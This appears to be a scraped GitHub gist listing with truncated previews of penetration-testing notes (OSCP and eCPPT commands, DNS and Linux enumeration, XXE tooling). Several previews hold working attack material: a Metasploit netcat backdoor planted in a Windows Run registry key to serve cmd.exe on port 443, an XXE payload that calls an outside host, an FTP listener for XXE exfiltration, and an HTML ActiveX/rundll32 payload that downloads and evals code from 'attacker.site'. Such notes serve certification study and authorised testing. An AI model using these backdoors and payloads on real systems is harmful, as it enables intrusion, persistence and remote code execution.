This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
OSCP Handy Commands | |
Nmap Full Web Vulnerable Scan: | |
mkdir /usr/share/nmap/scripts/vulscan | |
cd /usr/share/nmap/scrripts/vulscan | |
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## msf netcat backdoor in persistance | |
- netcat is uncluded in metasploit | |
- | |
- upload /usr/share/windwos-binaries/nc.exe C:\\windows\\system32 ## must have system rights | |
- | |
- | |
- ## registry key adding | |
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run | |
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' | |
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
eCPPT NETWORK SECURITY | |
*DNS Enumeration | |
nslookup example.com | |
nslookup -query=mx domain | |
nslookup -query=ns domain | |
nslookup -query=any domain | |
interactime mode { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
How to pass the OSCP | |
Recon | |
Find vuln | |
Exploit | |
Document it | |
Recon | |
Unicornscans in cli, nmap in msfconsole to help store loot in database. | |
TCP | |
unicornscan -i tap0 -I -mT $IP:a |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Penetrating Testing/Assessment Workflow & other fun infosec stuff | |
https://github.com/jivoi/pentest | |
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole* | |
Reconnaissance | |
Passive/Semi-Passive | |
Tools | |
Discover - https://github.com/leebaird/discover |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM ubuntu:16.04 | |
RUN apt update ; \ | |
apt install -y git apache2 | |
RUN mkdir /srv/git | |
COPY git-http.conf . | |
RUN cat git-http.conf >> /etc/apache2/apache2.conf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/env/python | |
from __future__ import print_function | |
import socket | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.bind(('0.0.0.0',2121)) | |
s.listen(1) | |
print('XXE-FTP listening ') | |
conn,addr = s.accept() | |
print('Connected by %s',addr) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Determine linux distribution and version | |
cat /etc/issue | |
cat /etc/*-release | |
cat /etc/lsb-release | |
cat /etc/redhat-release | |
// Determine kernel version - 32 or 64-bit? | |
cat /proc/version | |
uname -a | |
uname -mrs |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html><html><head><title>Click Me</title><head></head><body> | |
This is a demo ! <br> | |
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> | |
<PARAM name="Command" value="ShortCut"> | |
<PARAM name="Button" value="Bitmap::shortcut"> | |
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://attacker.site/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> | |
<PARAM name="Item2" value="273,1,1"> | |
</OBJECT> | |
<SCRIPT> | |
x.Click(); |
OlderNewer